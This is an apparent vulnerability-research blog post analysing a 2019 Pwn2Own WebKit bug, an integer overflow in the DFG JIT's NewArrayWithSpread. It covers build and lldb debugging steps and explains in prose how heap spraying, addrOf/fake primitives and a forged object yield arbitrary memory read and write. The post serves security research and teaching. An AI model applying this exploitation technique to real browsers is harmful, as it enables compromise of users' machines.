Diving Deep Into a Pwn2Own Winning WebKit Bug
November 26, 2019 | Ziad BadawiPwn2Own Tokyo just completed, and it got me thinking about a WebKit bug used by the team of Fluoroacetate (Amat Cama and Richard Zhu) at this year’s Pwn2Own in Vancouver. It was a part of the chain that earned them $55,000 and was a nifty piece of work. Since the holidays are coming up, I thought it would be a great time to do a deep dive into the bug and show the process I used for verifying their discovery.
Let’s start with the PoC:
First of all, we need to compile the affected WebKit version which was Safari version 12.0.3 at the time of the springtime Pwn2Own 2019 contest. According to Apple's releases, this translates to revision 240322.
svn checkout -r 240322 https://svn.webkit.org/repository/webkit/trunk webkit_ga_asan
Let's compile it with AddressSanitizer (ASAN). This will allow us to detect memory corruption as soon as it happens.
ZDIs-Mac:webkit_ga_asan zdi$ Tools/Scripts/set-webkit-configuration --asan
ZDIs-Mac:webkit_ga_asan zdi$ Tools/Scripts/build-webkit # --jsc-only can be used here which should be enough
We are going to use lldb
for debugging because it is already included with macOS. As the POC does not include any rendering code, we can execute it using JavaScriptCore (JSC) only in lldb
. For jsc
to be executed in lldb
, its binary file needs to be called instead of the script run-jsc
. This file is available in WebKitBuild/Release/jsc
and an environment variable is required for it to run correctly.
I should point out that:
env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release
can be run within lldb
, but placing it in a text file and passing that to lldb -s
is the preferred method.
ZDIs-Mac:webkit_ga_asan zdi$ cat lldb_cmds.txt
env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release
r
Let’s start debugging.
It crashes at 0x6400042d1d29: mov qword ptr [rcx + 8*rsi], r8
, which appears to be an out-of-bounds write. The stack trace shows that this occurs in the VM, meaning in compiled or JIT’ed code. We also notice that rsi
, used as the index, contains 0x20000040
. We have seen that number before in the POC.
It is the size of bigarr
! (minus one), which is essentially NUM_SPREAD_ARGS * sizeof(a)
.
In order to see the JITed code, we can set the JSC_dumpDFGDisassembly environment variable so jsc
can dump compiled code in DFG and FTL.
ZDIs-Mac:webkit_ga_asan zdi$ JSC_dumpDFGDisassembly=true lldb -s lldb_cmds.txt WebKitBuild/Release/jsc ~/poc3.js
This will dump a lot of extraneous assembly. So, how are we going to pinpoint relevant code?
We know that the crash happens at 0x6400042d1d29: mov qword ptr [rcx + 8*rsi], r8
. Why don’t we try searching for that address? It might lead to something relevant.
Bingo! Right in the DFG.
The NewArrayWithSpread
is called when creating a new array using the spread operator ...
in the DFG JIT tier. This occurs in function f
that is generated by gen_func
and called in a loop. The main reason for iterating ITERS
times in f
is to make that part of the code hot, causing it to be optimized by the DFG JIT tier.
Digging through the source code, we find the function SpeculativeJIT::compileNewArrayWithSpread
in Source/JavaScriptCore/dfg/DFGSpeculativeJIT.cpp
. This is where DFG emits code. Emitting code means writing the JIT-produced machine code into memory for later execution.
We can understand that machine code by taking a look at compileNewArrayWithSpread
. We see compileAllocateNewArrayWithSize()
is responsible for allocating a new array with a certain size. Its third parameter, sizeGPR
, is passed to emitAllocateButterfly()
as its second argument, which means it will handle allocating a new butterfly, memory space containing values of a JS object, for the array. If you aren’t familiar with the butterfly of JSObject, more info may be found here.
Jumping to emitAllocateButterfly()
, we see that the size parameter sizeGPR
is shifted 3 bits to the left (multiplied by 8) and then added to the constant sizeof(IndexingHeader)
.
To make things simpler, we need to match the actual machine code to the C++ code we have in this function. The m_jit
field is of type JITCompiler.
DFG::JITCompiler is responsible for generating JIT code from the dataflow graph. It does so by delegating to the speculative & non-speculative JITs, which generate to a MacroAssembler (which the JITCompiler owns through an inheritance relationship). The JITCompiler holds references to information required during compilation, and also records information used in linking (e.g. a list of all calls to be linked).
This means the calls you see, such as m_jit.move()
, m_jit.add32()
, etc., are functions that emit assembly. By tracking each one we will be able to match it with its C++ counterpart. We configure lldb
with our preference of Intel assembly, in addition to the malloc debugging feature for tracking memory allocations.
ZDIs-Mac:~ zdi$ cat ~/.lldbinit
settings set target.x86-disassembly-flavor intel
type format add --format hex long
type format add --format hex "unsigned long"
command script import lldb.macosx.heap
settings set target.env-vars
DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib
settings set target.env-vars MallocStackLogging=1
settings set target.env-vars MallocScribble=1
Because a large size is being allocated with Guard Malloc enabled, we need to set another environment variable that will allow such allocation.
ZDIs-Mac:webkit_ga_asan zdi$ cat lldb_cmds.txt
env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release
env MALLOC_PERMIT_INSANE_REQUESTS=1
r
JSC_dumpDFGDisassembly
will dump assembly in AT&T format, so we run disassemble -s 0x6400042d1c22 -c 70
to get it in Intel flavor which will end up as the following:
Let us try to match some code from emitAllocateButterfly()
. Looking at the assembly listing, we can match the following:
It is time to see what the machine code is trying to do. We need to set breakpoint there and see what is going on. To do that, we added a dbg() function to jsc.cpp
before compilation. This will help a lot in breaking into JS code whenever we want. The compiler complained that exec
in the EncodedJSValue JSC_HOST_CALL functionDbg(ExecState* exec)
function was not used, so it failed. To go around that, we just added exec->argumentCount();
which should not affect execution.
Let’s add dbg()
here, because the actual NewArrayWithSpread
function will be executed during the creation of bigarr
.
Running JSC_dumpDFGDisassembly=true lldb -s lldb_cmds.txt WebKitBuild/Release/jsc ~/poc3.js
again will dump the assembly and stop at:
This breaks exactly before the creation of bigarr
, and you can see the machine code for NewArrayWithSpread
. Let us put a breakpoint on the start of the function and continue execution.
The breakpoint is hit!
Before stepping through, let’s talk a little about what a JS object looks like in memory.
describe()
is a nice little function that only runs in jsc
. It shows us where a JS object is located in memory, its type, and a bit more, as displayed below:
Notice above how the arr_dbl
object changes types from ArrayWithDouble
to ArrayWithContiguous
after adding an object. This is because its structure changed, it no longer stores only double values but multiple types.
A JS object is represented in memory as follows:
Let’s start with the arr
array in the example above. By dumping the object address 0x1034b4320
, we see above two quadwords. The first is a JSCell and the second is the butterfly pointer.
The JSCell consists of
-- StructureID m_structureID; # e.g. 0x5f (95) in the first quadword of arr object. (4 bytes)
-- IndexingType m_indexingTypeAndMisc; # 0x05 (1 byte)
-- JSType m_type; # 0x21 (1 byte)
-- TypeInfo::InlineTypeFlags m_flags; # 0x8 (1 byte)
-- CellState m_cellState; # 0x1 (1 byte)
The butterfly pointer points to the actual elements within the array.
The values 1,2,3,4,6
are shown here starting with 0xffff
as this is how integers are represented in memory as a JSValue. If we go back 0x10 bytes, we see the array length, which is 5.
Some objects do not have a butterfly, so their pointer is null or 0 as shown below. Their properties will be stored inline as displayed.
This script will help for double-to-memory address conversion and vice versa.
This was a short intro but for more information and details on structures, butterflies, properties, boxing, unboxing and JS objects, check Saelo’s awesome article and talk. In addition to that, check out LiveOverflow's great series on WebKit.
Let’s continue stepping through the breakpoint.
All right, so, what is going on here?
Note this part from the PoC:
The mk_arr
funtions creates an array with the first argument as size and second argument as elements. The size is (0x20000000 + 0x40) / 8 = 0x4000008
, which creates an array with size 0x4000008
and element values of 0x4141414141410000
.The i2f
function is for converting an integer to a float so that it ends up with the expected value in memory. LiveOverflow explains it well in his WebKit series.
Given that, we now know that rcx
points to object a
’s butterfly - 0x10 because its size is rcx + 8
, which makes the butterfly rcx + 0x10
. Going through the rest of this code, we see that r8
, r10
, rdi
, r9
, rbx
, r12
, and r13
all point to a copy of object a
- eight copies to be specific, and edx
keeps adding the sizes of each.
Looking at edx
, its value becomes 0x20000040
.
So, what are those eight a
copies? And what is the value 0x20000040
?
Looking back at the PoC:
The means f
becomes:
f
creates an array by spreading NUM_SPREAD_ARGS (8)
copies of the first argument and a single copy of its second argument. f
is called with objects a
(8 * 0x04000008) and c
(length 1). When NewArrayWithSpread
gets called, it makes room for those 8 a
’s and 1 c
.
The last step through shows length of object c
, which makes the final edx
value 0x20000041
.
The next step should be the allocation of that length, which happens inside emitAllocateButterfly()
.
We notice the overflow that occurs at shl r8d, 0x3
where 0x20000041
gets wrapped around to 0x208
. The allocation size becomes 0x210
when it gets passed to emitAllocateVariableSized()
.
The out-of-bounds read access violation we see happens in the following snippet on mov qword ptr [rcx + 8*rsi], r8
. What this snippet does is iterate the newly created butterfly backwards with incorrect size 0x20000041
while the real size is 0x210
after the overflow. It then zeros out each element but since the actual size in memory is way smaller than 0x20000041
, it reaches an out-of-bounds access violation in the ASAN build.
The Primitives
This might seem like just an integer overflow, but it is much more than that. When the allocation size wraps around, it becomes smaller than the initial value thus enabling the creation of an undersized butterfly. This would trigger a heap overflow later when data gets written to it, so other arrays in its vicinity will get corrupted. We are planning on doing the following:
- Spray a bunch of arrays
- Write to bigarr in order to cause a heap overflow that will corrupt sprayed arrays
- Use corrupted arrays to achieve read (addrOf) / write (fake) to the heap using fake JS objects
The following snippet shows the spray. When f()
is called, the integer overflow will trigger when creating a butterfly with length 0x20000041
, thus producing an undersized one because of the wraparound. However, 0x20000041
elements will be written nonetheless, leading to a heap overflow. When c
is accessed, the defined getter of its first element will set off and fill up the spray array with 0x4000
elements of newly created arrays from the slice()
call.
The large number of butterflies created in spray
and the huge length of bigarr
’s butterfly are bound to overlap at some point because of the heap overflow and that butterflies are created in the same memory space. After executing the POC in a non-ASAN release build, we get the following.
We notice how the butterfly of one of spray
’s objects (that are either spray_arr
or spray_arr2
) towards the end was overlapped by bigarr
.
The following might help in visualizing what is going on.
It is important to note here the types of spray_arr
and spray_arr2
as it is necessary for constructing the exploit primitives. They are ArrayWithDouble
and ArrayWithContiguous
respectively. This means that an array with type ArrayWithDouble
contains non-boxed float values, which means an element is written and read as a native float number. ArrayWithContiguous
is different as it treats its elements as boxed JSValues
so it reads and writes JS objects.
The basic idea is finding a way for writing an object to the ArrayWithContiguous
array (spray_arr2
) and then reading its memory address from the ArrayWithDouble
array (spray_arr
). The same is true vice versa where we write a memory address to spray_arr
and read it as an object using spray_arr2
.
In order to do that, we need to get hold of the overlapped space using the two arrays spray_arr
and spray_arr2
.
Let us take a look at the following:
This snippet is looping spray
, specifically the ArrayWithDouble
instances (spray_arr
), and breaking when it finds the first overlapped space with bigarr
, thus returning its index, oobarr_idx
, in spray and a new object, oobarr
, pointing to that space. The main condition to satisfy for breaking is spray[i].length > 0x40
because when spray[i]
points to the bigarr
data, which consists of 0x4142414141410000
. Its length will be located 8 bytes back, which is also 0x4142414141410000
. This makes the length be 0x41410000
, which is > 0x40
. What is oobarr
? It is an array of type ArrayWithDouble
pointing to the beginning of the overlapped space between spray and bigarr
. The oobarr[0]
function should return 0x4142414141410000
. The oobarr
array is the first one we can use in order to read and write object addresses.
contarr
is an array of type ArrayWithContiguous
pointing to a space that is shared with oobarr
. Below shows the snippet executed:
The following shows both addrOf
and fake
primitives. The addrOf
primitive is used to return an address of any JS object by writing it to the ArrayWithContiguous
array and reading it from the ArrayWithDouble
array as a float. The fake
primitive is the opposite. It is used to create a JS object from a memory address by writing the address to ArrayWithDouble
and reading from ArrayWithContiguous
.
It is clear in the debugger output that both primitives work as expected.
The next step is achieving arbitrary read/write by creating a fake object and controlling its butterfly. We know by now that objects store data in their butterfly if they are not inline. This looks like (from Filip Pizlo's talk):
Check out the following:
We create an empty array (length 0) with a single property, p0
, containing a string. Its memory layout is shown below. When we go butterfly 0x10
, we see the quadwords for length and the first property. Its vector length is 0, while the property points to 0x1034740a0
. It should be clear by now that in order to access a property in an object, we get the butterfly then subtract 0x10
. What happens if we control the butterfly? Well, arbitrary read and write happens.
For any JS object to be valid in memory, its JSCell
must be valid as well, and that includes its structure ID. Structure IDs cannot be generated manually, but they are predictable, at least on the build we are working on. Since we are planning on creating a fake object, we need to make sure it has a valid JSCell
.
The following snippet sprays 0x400 a
objects so we can predict a value between 1 and 0x400 for its structure ID.
We need to create a victim object that we control. Take a look at the following: mngr
is the middle object in struct_spray
, and we create victim
making sure it resides in the address range after mngr
’s address.
We are going to use the outer
object to create the fake object hax
. The first property a
is basically going to be the JSCell of the fake object. It will end up as 0x0108200700000200
, which means 0x200
is the structure ID we predicted. The - (1<<16)
data-preserve-html-node="true" part is just to account for the boxing effect (which adds 2^48) when that value is stored in the object. The b
property will be the butterfly of the fake object. To create hax
, we get the outer
address and then add 0x10 to it. We then feed the result to fake
that was created earlier. The object’s layout is shown in lldb
output below.
When accessing an index of hax
, it means we are accessing the memory space starting from mngr
’s address shown below. Since objects are located in the same space and victim
was created last, it is located after mngr
. Subtracting mngr_addr
fromvictim_addr
, we can reach victim
’s JSCell and butterfly (+8) when indexing the result in hax
.
Let's achieve arbitrary read/write:
As we mentioned previously, when accessing victim.p0
, its butterfly is fetched then goes backwards 0x10 in order to grab its first property. set_victim_addr
sets victim
’s butterfly to the value we provide plus 0x10. It is easier to look at it in the debugger.
Looking at the dump above, we notice that originally, victim
’s butterfly was 0x18014e8028
. Later, it became 0x18003e4030
, which is actually test’s address plus 0x18. When read64
is called, it is passed test’s address plus 8 since we are trying to read its butterfly. Within set_victim_addr
, another 0x10 is added to the address. When victim.p0
is read, its butterfly 0x2042fc058
is fetched, then 0x10 is subtracted. This results in 0x2042fc048
, which actually points to test's butterfly. victim.p0
actually fetches the value that is pointed by the property address (0x18003e4030
in this case). Adding an addrOf()
to that will get us the actual 0x18003e4030 value. Now we have achieved arbitrary read. Writing is similar as shown in write64 where we write to victim.p0
a value using fake()
.
Neat, right?
Conclusion
I hope you have enjoyed this in-depth walkthrough. Bugs that come into the program through Pwn2Own tend to be some of the best we see, and this one is no exception. I also hope you learned a bit about lldb
and walking through WebKit looking for bugs. If you find any, you know where to send them. 😀
You can find me on Twitter at @ziadrb, and follow the team for the latest in exploit techniques and security patches.